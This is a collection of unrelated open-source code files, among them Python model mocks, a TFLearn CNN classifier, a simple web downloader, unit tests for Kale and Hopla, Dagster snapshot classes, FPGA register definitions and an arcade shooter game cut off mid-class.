examples/ModelMocks.py | pedro19v/GIMME | 0 | 12796626 | <reponame>pedro19v/GIMME<filename>examples/ModelMocks.py<gh_stars>0
from GIMMECore import TaskModelBridge
from GIMMECore import PlayerModelBridge
class PlayerModelMock(object):
def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):
self.currState = currState
self.id = id
self.name = name
self.pastModelIncreasesGrid = pastModelIncreasesGrid
# self.preferencesEst = preferencesEst.normalized()
# self.realPreferences = realPreferences.normalized()
self.baseLearningRate = None
class TaskModelMock(object):
def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):
self.id = id
self.description = description
self.minRequiredAbility = minRequiredAbility
self.profile = profile
self.difficultyWeight = difficultyWeight
self.profileWeight = profileWeight
self.minDuration = minDuration
class CustomTaskModelBridge(TaskModelBridge):
def __init__(self, tasks):
self.tasks = tasks
self.numTasks = len(tasks)
def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):
self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight)
def getAllTaskIds(self):
return [int(i) for i in range(self.numTasks)]
def getTaskInteractionsProfile(self, taskId):
return self.tasks[taskId].profile
def getMinTaskRequiredAbility(self, taskId):
return self.tasks[taskId].minRequiredAbility
def getMinTaskDuration(self, taskId):
return self.tasks[taskId].minDuration
def getTaskDifficultyWeight(self, taskId):
return self.tasks[taskId].difficultyWeight
def getTaskProfileWeight(self, taskId):
return self.tasks[taskId].profileWeight
def getTaskInitDate(self, taskId):
return self.tasks[taskId].initDate
def getTaskFinalDate(self, taskId):
return self.tasks[taskId].finalDate
class CustomPlayerModelBridge(PlayerModelBridge):
def __init__(self, players):
self.players = players
self.numPlayers = len(players)
def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):
self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences)
def resetPlayer(self, playerId):
self.players[int(playerId)].currState.reset()
self.players[int(playerId)].pastModelIncreasesGrid.reset()
def resetState(self, playerId):
self.players[int(playerId)].currState.reset()
def setAndSavePlayerStateToGrid(self, playerId, increases, newState):
self.players[int(playerId)].currState = newState
self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases)
def setBaseLearningRate(self, playerId, blr):
self.players[int(playerId)].baseLearningRate = blr
def getBaseLearningRate(self, playerId):
return self.players[int(playerId)].baseLearningRate
def getAllPlayerIds(self):
return [int(i) for i in range(self.numPlayers)]
def getPlayerName(self, playerId):
return self.players[int(playerId)].name
def getPlayerCurrState(self, playerId):
return self.players[int(playerId)].currState
def getPlayerCurrProfile(self, playerId):
return self.players[int(playerId)].currState.profile
def getPlayerStatesDataFrame(self, playerId):
return self.players[int(playerId)].pastModelIncreasesGrid
def getPlayerCurrCharacteristics(self, playerId):
return self.players[int(playerId)].currState.characteristics
def getPlayerPreferencesEst(self, playerId):
return self.players[int(playerId)].preferencesEst
def setPlayerPreferencesEst(self, playerId, preferencesEst):
self.players[int(playerId)].preferencesEst = preferencesEst
def setPlayerCharacteristics(self, playerId, characteristics):
self.players[int(playerId)].currState.characteristics = characteristics
def setPlayerProfile(self, playerId, profile):
self.players[int(playerId)].currState.profile = profile
def setPlayerGroup(self, playerId, group):
self.players[int(playerId)].currState.group = group
def setPlayerTasks(self, playerId, tasks):
self.players[int(playerId)].currState.tasks = tasks
def setPlayerRealPreferences(self, playerId, realPreferences):
self.players[int(playerId)].realPreferences = realPreferences
def getPlayerRealPreferences(self, playerId):
return self.players[int(playerId)].realPreferences | 2.53125 | 3 |
src/conv_net.py | chatdip98/Acoustic-Scene-Classification | 0 | 12796627 | <reponame>chatdip98/Acoustic-Scene-Classification
#----convolutional neural network for classification------
#importing required libraries and modules
import os
import numpy as np
import tensorflow as tf
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
class CNN():
    data_size = 'full'
def __init__(self): #constructor
pass
def create_1ConvModel(self):
#creating the CNN model as per the architecture followed with 4-conv and pooling layers
self.convnet = input_data(shape=[None, 128, 431, 1], name='input')
self.convnet = conv_2d(self.convnet, 32, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = conv_2d(self.convnet, 64, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = conv_2d(self.convnet, 128, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = conv_2d(self.convnet, 256, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet)
self.convnet = fully_connected(self.convnet, 1024, activation='relu')
#self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting
self.convnet = fully_connected(self.convnet, 15, activation='softmax')
self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01,
loss='categorical_crossentropy', name='targets')
self.model = tflearn.DNN(self.convnet)
return self.model
def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val):
#training the created model with data from the user
        #stochastic learning (minibatch size = 1) is used here since the input dataset is fairly small
self.epoch = 10 #set the number of epochs
model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch,
validation_set=({'input' : X_val}, {'targets' : Y_val}),
show_metric=True, run_id='DCNet')
model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3 files will be created for each model
return model
def predict_test_data(self, arg, model, X_test, Y_test):
self.ans = []
count = 0
for i in range(len(X_test)):
self.pr = model.predict([X_test[i]])[0]
self.ans.append(self.pr)
if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])):
count+=1
print(arg, "Test Accuracy = ", (count/len(X_test))*100, "%") #calculating test accuracy for each classifier
#saving the softmax outputs for using them later for calculating the ensemble accuracy
np.save('test_prediction/full/'+arg+'.npy', np.array(self.ans)) | 3.109375 | 3 |
previous code/lea_1.py | hyywestwood/Spider-of-Water-data | 2 | 12796628 | # -*- coding: utf-8 -*-
# @Time : 2019/4/22 14:57
# @Author : hyy
# @Email : <EMAIL>
# @File : lea_1.py
# @Software: PyCharm
import urllib.request
def download(url, num_retries = 2):
print('Downloading:',url)
headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'}
request = urllib.request.Request(url, headers=headers)
try:
html = urllib.request.urlopen(request).read()
except urllib.request.URLError as e:
print('Download error:', e.reason)
html = None
if num_retries > 0:
if hasattr(e, 'code') and 500 <= e.code < 600:
return download(url, num_retries-1)
return html
if __name__ == '__main__':
html = download('http://httpstat.us/500') | 3.265625 | 3 |
kale/tests/unit_tests/test_jupyter_utils.py | klolos/kale | 0 | 12796629 | # Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import json
import pytest
from testfixtures import mock
from kale.utils import jupyter_utils as ju
def _output_display(data):
# `data` must be a list
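    # e.g. _output_display({'text/plain': 'hi'})
    #   -> [{'output_type': 'display_data', 'data': {'text/plain': 'hi'}}]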
return [{'output_type': 'display_data', 'data': data}]
@pytest.mark.parametrize("outputs,target", [
([], ""),
# ---
(_output_display({'image/png': "bytes"}),
ju.image_html_template.format("", "bytes")),
# ---
(_output_display({'text/html': "bytes"}), "bytes"),
# ---
(_output_display({'text/plain': "bytes"}),
ju.text_html_template.format("bytes")),
# ---
(_output_display({'application/javascript': "bytes"}),
ju.javascript_html_template.format("bytes")),
])
def test_generate_html_output(outputs, target):
"""Tests html artifact generation from cell outputs."""
assert target == ju.generate_html_output(outputs)
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_not_exists(pod_utils, tmpdir):
"""Test the uimetadata file is created when it does not exists."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
base = {"outputs": []}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_not_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
markdown = {
'type': 'markdown',
'storage': 'inline',
'source': '#Some markdown'
}
base = {"outputs": [markdown]}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [markdown, {
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)
def test_run_code():
"""Test that Python code runs inside a jupyter kernel successfully."""
# test standard code
code = ("a = 3\nprint(a)", )
ju.run_code(code)
# test magic command
code = ("%%time\nprint('Some dull code')", )
ju.run_code(code)
| 1.78125 | 2 |
python_modules/dagster/dagster/core/snap/repository_snapshot.py | flowersw/dagster | 3 | 12796630 | <filename>python_modules/dagster/dagster/core/snap/repository_snapshot.py
from collections import OrderedDict, namedtuple
from dagster import RepositoryDefinition, check
from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot
from dagster.serdes import whitelist_for_serdes
class RepositoryIndex:
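    # Wraps a RepositorySnapshot and indexes its pipeline snapshots by name,
    # so the lookups below are plain dict accesses.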
def __init__(self, repository_snapshot):
self.repository_snapshot = check.inst_param(
repository_snapshot, 'repository_snapshot', RepositorySnapshot
)
self._pipeline_index_map = OrderedDict(
(pipeline_snapshot.name, PipelineIndex(pipeline_snapshot))
for pipeline_snapshot in repository_snapshot.pipeline_snapshots
)
def get_pipeline_index(self, pipeline_name):
return self._pipeline_index_map[pipeline_name]
def has_pipeline_index(self, pipeline_name):
return pipeline_name in self._pipeline_index_map
def get_pipeline_indices(self):
return self._pipeline_index_map.values()
@staticmethod
def from_repository_def(repository_definition):
return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition))
@whitelist_for_serdes
class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')):
def __new__(cls, name, pipeline_snapshots):
return super(RepositorySnapshot, cls).__new__(
cls,
name=check.str_param(name, 'name'),
pipeline_snapshots=check.list_param(
pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot
),
)
def has_pipeline_snapshot(self, pipeline_name):
check.str_param(pipeline_name, 'pipeline_name')
for pipeline in self.pipeline_snapshots:
if pipeline.name == pipeline_name:
return True
return False
def get_pipeline_snapshot(self, pipeline_name):
check.str_param(pipeline_name, 'pipeline_name')
for pipeline in self.pipeline_snapshots:
if pipeline.name == pipeline_name:
return pipeline
check.failed('pipeline not found')
def get_all_pipeline_snapshots(self):
return self.pipeline_snapshots
@staticmethod
def from_repository_definition(repository_definition):
check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition)
return RepositorySnapshot(
name=repository_definition.name,
pipeline_snapshots=[
PipelineSnapshot.from_pipeline_def(pipeline_definition)
for pipeline_definition in repository_definition.get_all_pipelines()
],
)
| 2.234375 | 2 |
spider_frame/framework/build/lib/scrapy_plus/middlwares/spider_middlewares.py | originx-23/spider_frame | 1 | 12796631 | # Spider middleware module: used to pre-process request and response data
class SpiderMiddleware(object):
def process_request(self, request):
        # Handles the request: called before the request object is handed to the engine
print("SpiderMiddleware-process_request-{}".format(request.url))
return request
def process_response(self, response):
        # Handles the response data: called before the response object is handed to the spider
print("SpiderMiddleware-process_response-{}".format(response.url))
return response
| 3.15625 | 3 |
src/tests/hoplalib/hatchery/test_hatchpotionmodels.py | rickie/hopla | 0 | 12796632 | <reponame>rickie/hopla<filename>src/tests/hoplalib/hatchery/test_hatchpotionmodels.py<gh_stars>0
#!/usr/bin/env python3
import random
from typing import List
import click
import pytest
from hopla.hoplalib.errors import YouFoundABugRewardError
from hopla.hoplalib.hatchery.hatchdata import HatchPotionData
from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \
HatchPotionException
_SAMPLE_SIZE = 10
class TestHatchPotion:
def test__init__invalid_name_fail(self):
name = "InvalidName"
with pytest.raises(HatchPotionException) as exec_info:
HatchPotion(name, quantity=1)
assert str(exec_info.value).startswith(f"{name} is not a valid hatching potion name.")
assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))
@pytest.mark.parametrize(
"potion_name,quantity",
list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),
range(-_SAMPLE_SIZE, 0)))
)
def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int):
with pytest.raises(HatchPotionException) as exec_info:
HatchPotion(potion_name, quantity=quantity)
assert str(exec_info.value).startswith(f"{quantity} is below 0.")
assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))
@pytest.mark.parametrize(
"potion_name,quantity",
list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),
range(0, _SAMPLE_SIZE)))
)
def test__repr__ok(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
result: str = repr(potion)
assert result == f"HatchPotion({potion_name}: {quantity})"
def test__eq__(self):
assert HatchPotion("Red") == HatchPotion("Red")
assert HatchPotion("Shimmer", quantity=1) == HatchPotion("Shimmer")
assert HatchPotion("Silver") != HatchPotion("Silver", quantity=2)
assert HatchPotion("Watery") != HatchPotion("Glow")
@pytest.mark.parametrize("potion_name,quantity", [
("Base", 10),
("CottonCandyBlue", 1),
("Golden", 0),
])
def test_is_standard_potion(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
assert potion.is_standard_hatch_potion() is True
assert potion.is_magic_hatch_potion() is False
assert potion.is_wacky_hatch_potion() is False
@pytest.mark.parametrize("potion_name,quantity", [
("BirchBark", 10),
("Windup", 1),
("Vampire", 0),
("Ruby", 9),
("Amber", 69),
("MossyStone", 42),
("SolarSystem", 9001),
])
def test_is_magic_potion(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
assert potion.is_standard_hatch_potion() is False
assert potion.is_magic_hatch_potion() is True
assert potion.is_wacky_hatch_potion() is False
@pytest.mark.parametrize("potion_name,quantity", [
("Veggie", 10),
("Dessert", 0),
])
def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int):
potion = HatchPotion(potion_name, quantity=quantity)
assert potion.is_standard_hatch_potion() is False
assert potion.is_magic_hatch_potion() is False
assert potion.is_wacky_hatch_potion() is True
class TestHatchPotionCollection:
def test__init__empty_ok(self):
collection = HatchPotionCollection()
assert collection == HatchPotionCollection({})
assert len(collection) == 0
def test__init__ok(self):
potion_dict = {"Base": 0, "Moonglow": 42, "Sunset": 2}
collection = HatchPotionCollection(potion_dict)
assert collection["Base"] == HatchPotion("Base", quantity=0)
assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42)
assert collection["Sunset"] == HatchPotion("Sunset", quantity=2)
def test__eq__ok(self):
left = HatchPotionCollection({"Frost": 1, "Glow": 1})
right = HatchPotionCollection({"Glow": 1, "Frost": 2})
assert left != right
assert HatchPotionCollection() == HatchPotionCollection()
assert HatchPotionCollection({"StarryNight": 1}) != HatchPotionCollection()
assert HatchPotionCollection({"Windup": 2}) == HatchPotionCollection({"Windup": 2})
assert HatchPotionCollection({"Frost": 1}) != HatchPotionCollection({"Frost": 2})
def test__iter__ok(self):
collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 2})
iterator = iter(collection)
assert next(iterator) == "Base"
assert next(iterator) == "Moonglow"
assert next(iterator) == "Sunset"
with pytest.raises(StopIteration):
next(iterator)
def test__getitem__ok(self):
collection = HatchPotionCollection({"Base": 1, "Moonglow": 42, "Sunset": 0})
assert collection["Base"] == HatchPotion("Base", quantity=1)
assert collection["Moonglow"] == HatchPotion("Moonglow", quantity=42)
assert collection["Sunset"] == HatchPotion("Sunset", quantity=0)
def test_values_ok(self):
potion1, quantity1 = "Dessert", 10
potion2, quantity2 = "MossyStone", 1
potion3, quantity3 = "StainedGlass", 2
collection = HatchPotionCollection({
potion1: quantity1, potion2: quantity2, potion3: quantity3
})
generator = collection.values()
assert next(generator) == HatchPotion(potion1, quantity=quantity1)
assert next(generator) == HatchPotion(potion2, quantity=quantity2)
assert next(generator) == HatchPotion(potion3, quantity=quantity3)
with pytest.raises(StopIteration):
_ = next(generator)
def test_values_as_list_ok(self):
potion1, quantity1 = "Golden", 1
potion2, quantity2 = "Sunshine", 41
potion3, quantity3 = "Vampire", 3
collection = HatchPotionCollection({
potion1: quantity1, potion2: quantity2, potion3: quantity3
})
result: List[HatchPotion] = list(collection.values())
expected: List[HatchPotion] = [
HatchPotion(potion1, quantity=quantity1),
HatchPotion(potion2, quantity=quantity2),
HatchPotion(potion3, quantity=quantity3)
]
assert result == expected
def test_remove_hatch_potion_ok(self):
potion1_quantity = 3
potion2_quantity = 42
potion3_name, potion3_quantity = "Sunset", 1
collection = HatchPotionCollection({
"Base": potion1_quantity,
"Moonglow": potion2_quantity,
potion3_name: potion3_quantity
})
collection.remove_hatch_potion(HatchPotion("Base"))
collection.remove_hatch_potion(HatchPotion("Moonglow"))
collection.remove_hatch_potion(HatchPotion(potion3_name))
assert collection["Base"] == HatchPotion("Base",
quantity=potion1_quantity - 1)
assert collection["Moonglow"] == HatchPotion("Moonglow",
quantity=potion2_quantity - 1)
assert collection[potion3_name] == HatchPotion(potion3_name,
quantity=potion3_quantity - 1)
    def test_remove_hatch_potion_not_available_fail(self):
collection = HatchPotionCollection({"Base": 1})
not_found_potion_name = "Moonglow"
with pytest.raises(HatchPotionException) as exec_info:
collection.remove_hatch_potion(HatchPotion(not_found_potion_name))
expected_msg = f"{not_found_potion_name} was not in the collection "
assert str(exec_info.value).startswith(expected_msg)
| 2.59375 | 3 |
firmware/common/pyrogue/common/AppCore.py | ruck314/dev-board-cryo | 1 | 12796633 | <filename>firmware/common/pyrogue/common/AppCore.py
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Title : PyRogue AMC Carrier Cryo Demo Board Application
#-----------------------------------------------------------------------------
# File : AppCore.py
# Created : 2017-04-03
#-----------------------------------------------------------------------------
# Description:
# PyRogue AMC Carrier Cryo Demo Board Application
#-----------------------------------------------------------------------------
# This file is part of the rogue software platform. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue software platform, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
from common.SimRtmCryoDet import *
class StreamData(pr.Device):
def __init__( self,
name = "StreamReg",
description = "Stream control",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#########
# Devices
for i in range(4096):
self.add(pr.RemoteVariable(
name = f'StreamData[{i}]',
description = "Dummy stream data",
offset = 0x000000 + i*0x2,
bitSize = 16,
bitOffset = 0,
base = pr.Int,
mode = "RW",
))
class StreamControl(pr.Device):
def __init__( self,
name = "StreamControl",
description = "Stream control",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#########
# Devices
self.add(pr.RemoteVariable(
name = "EnableStreams",
description = "EnableStream",
offset = 0x00000008,
bitSize = 1,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "StreamCounterRst",
description = "Reset stream counters",
offset = 0x00000008,
bitSize = 1,
bitOffset = 8,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "EofeCounterRst",
description = "Reset stream EOFE",
offset = 0x00000008,
bitSize = 1,
bitOffset = 9,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "StreamCounter",
description = "Count number of stream triggers",
offset = 0x0000000C,
bitSize = 32,
bitOffset = 0,
base = pr.UInt,
mode = "RO",
pollInterval = 1,
))
self.add(pr.RemoteVariable(
name = "EofeCounter",
description = "Stream EOFE counter",
offset = 0x00000010,
bitSize = 32,
bitOffset = 0,
base = pr.UInt,
mode = "RO",
pollInterval = 1,
))
class AppCore(pr.Device):
def __init__( self,
name = "AppCore",
description = "MicrowaveMux Application",
numRxLanes = [0,0],
numTxLanes = [0,0],
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#########
# Devices
#########
# for i in range(2):
# if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)):
# self.add(AmcMicrowaveMuxCore(
# name = "MicrowaveMuxCore[%i]" % (i),
# offset = (i*0x00100000),
# expand = True,
# ))
#
# self.add(SysgenCryo(offset=0x01000000, expand=True))
self.add(SimRtmCryoDet( offset=0x02000000, expand=False))
###########
# Registers
###########
self.add(pr.RemoteVariable(
name = "DacSigTrigDelay",
description = "DacSig TrigDelay",
offset = 0x03000000,
bitSize = 24,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
units = "1/(307MHz)",
))
self.add(pr.RemoteVariable(
name = "DacSigTrigArm",
description = "DacSig TrigArm",
offset = 0x03000004,
bitSize = 1,
bitOffset = 0,
base = pr.UInt,
mode = "WO",
hidden = True,
))
self.add(StreamControl(
offset=0x03000000,
))
self.add(StreamData(
offset=0x04000000,
expand=False,
))
##############################
# Commands
##############################
@self.command(description="Arms for a DAC SIG Trigger to the DAQ MUX",)
def CmdDacSigTrigArm():
self.DacSigTrigArm.set(1)
| 1.460938 | 1 |
shooting_game/assets/Shooter-Game.py | rodsam9/cse210-project | 0 | 12796634 | <filename>shooting_game/assets/Shooter-Game.py<gh_stars>0
import random
import arcade
import math
import os
from arcade.color import BLACK, WHITE
SPRITE_SCALING_PLAYER = .60
SPRITE_SCALING_ENEMY = 0.5
SPRITE_SCALING_ENEMY_2 = 0.15
SPRITE_SCALING_ENEMY_3 = 0.3
SPRITE_SCALING_BULLET = 0.7
ENEMY_COUNT = 15
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Shooter Game"
SPRITE_SPEED = 0.20
BULLET_SPEED = 5
HEALTHBAR_WIDTH = 25
HEALTHBAR_HEIGHT = 5
HEALTHBAR_OFFSET_Y = -10
HEALTH_NUMBER_OFFSET_X = -10
HEALTH_NUMBER_OFFSET_Y = -25
MOVEMENT_SPEED = 5
class PLAYER(arcade.Sprite):
def __init__(self, image, scale, player_max_health):
super().__init__(image, scale)
# Add extra attributes for health
self.player_max_health = player_max_health
self.player_cur_health = player_max_health
def player_draw_health_number(self):
        # Draw the player's current and max health as text
health_string = f"{self.player_cur_health}/{self.player_max_health}"
start_x = 25
start_y = 40
arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12)
# arcade.draw_text(health_string,
# start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,
# start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,
# font_size=12,
# color=arcade.color.WHITE)
def player_draw_health_bar(self):
# Draw the health bar
# Draw the red background
start_x = 120
start_y = 35
if self.player_cur_health < self.player_max_health:
arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X,
start_y + HEALTHBAR_OFFSET_Y,
width=HEALTHBAR_WIDTH + 60,
height=HEALTHBAR_HEIGHT + 10,
color=arcade.color.RED)
# Calculate width based on health
start_x = 85
start_y = 25
health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health)
arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width),
start_y ,
width=health_width + 10,
height=HEALTHBAR_HEIGHT + 10,
color=arcade.color.GREEN)
def update(self):
""" Move the player """
# Move player around the screen
self.center_x += self.change_x
self.center_y += self.change_y
# Check for out-of-bounds
if self.left < 0:
self.left = 0
elif self.right > SCREEN_WIDTH - 1:
self.right = SCREEN_WIDTH - 1
# Make sure he cant go off the screen
if self.bottom < 0:
self.bottom = 0
elif self.top > SCREEN_HEIGHT - 1:
self.top = SCREEN_HEIGHT - 1
class ENEMY(arcade.Sprite):
def update(self):
        # Rotate the enemy sprite.
        # The arcade.Sprite class has an "angle" attribute that controls
        # the sprite rotation. Change this, and the sprite rotates.
self.angle += self.change_angle
def follow_sprite(self, player_sprite):
# This tells the enemies to go to the main guy
if self.center_y < player_sprite.center_y:
self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y)
elif self.center_y > player_sprite.center_y:
self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y)
if self.center_x < player_sprite.center_x:
self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x)
elif self.center_x > player_sprite.center_x:
self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x)
def __init__(self, image, scale, enemy_max_health):
super().__init__(image, scale)
# Add extra attributes for health
self.enemy_max_health = enemy_max_health
self.enemy_cur_health = enemy_max_health
def enemy_draw_health_number(self):
        # Draw the enemy's current and max health as text
health_string = f"{self.enemy_cur_health}/{self.enemy_max_health}"
arcade.draw_text(health_string,
start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,
start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,
font_size=12,
color=arcade.color.WHITE)
def enemy_draw_health_bar(self):
# Draw the health bar
# Draw the red background
if self.enemy_cur_health < self.enemy_max_health:
arcade.draw_rectangle_filled(center_x=self.center_x,
center_y=self.center_y + HEALTHBAR_OFFSET_Y,
width=HEALTHBAR_WIDTH,
height=3,
color=arcade.color.RED)
# Calculate width based on health
health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health)
arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width),
center_y=self.center_y - 10,
width=health_width,
height=HEALTHBAR_HEIGHT,
color=arcade.color.GREEN)
class MenuView(arcade.View):
""" Class that manages the 'menu' view. """
def on_show(self):
""" Called when switching to this view"""
arcade.set_background_color(arcade.color.BLACK)
def on_draw(self):
""" Draw the menu """
arcade.start_render()
start_x = 220
start_y = 370
arcade.draw_text("Shooter Game", start_x, start_y, arcade.color.WHITE, 50)
self.player_sprite = PLAYER(":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png", SPRITE_SCALING_PLAYER, player_max_health=10)
start_x = 208
start_y = 270
arcade.draw_text("Use the arrow keys on your keyboard to move around", start_x, start_y, arcade.color.RED, 15)
start_x = 310
start_y = 240
arcade.draw_text("Use your mouse to aim", start_x, start_y, arcade.color.RED, 15)
start_x = 360
start_y = 210
arcade.draw_text("Click to Shoot", start_x, start_y, arcade.color.RED, 15)
start_x = 330
start_y = 110
arcade.draw_text("Click to start", start_x, start_y, arcade.color.WHITE, 20)
arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE)
def on_mouse_press(self, _x, _y, _button, _modifiers):
""" Use a mouse press to advance to the 'game' view. """
game_view = MyGame()
game_view.setup()
self.window.show_view(game_view)
arcade.run()
class GameOverView(arcade.View):
""" Class to manage the game over view """
def on_show(self):
""" Called when switching to this view"""
arcade.set_background_color(arcade.color.BLACK)
def on_draw(self):
""" Draw the game over view """
arcade.start_render()
arcade.draw_text("Game Over!\n", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5,
arcade.color.RED, 100, anchor_x="center")
start_x = 290
start_y = 270
arcade.draw_text(f"You died in level: {self.window.level}", start_x, start_y, arcade.color.RED, 20)
arcade.draw_text("Click ESCAPE to return to Main Menu.\n", SCREEN_WIDTH/2, SCREEN_HEIGHT/4,
arcade.color.WHITE, 25, anchor_x="center")
def on_key_press(self, key, _modifiers):
""" If user hits escape, go back to the main menu view """
if key == arcade.key.ESCAPE:
menu_view = MenuView()
self.window.show_view(menu_view)
class MyGame(arcade.View):
""" Main application class. """
def __init__(self):
""" Initializer """
# Call the parent class initializer
#super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
super().__init__()
# Variables that will hold sprite lists
self.player_list = None
self.enemy_list = None
self.bullet_list = None
# Set up the player
self.player_sprite = None
self.enemy_health = 2
self.enemy_health2 = 5
self.enemy_health3 = 10
self.good = True
self.window.level = 1
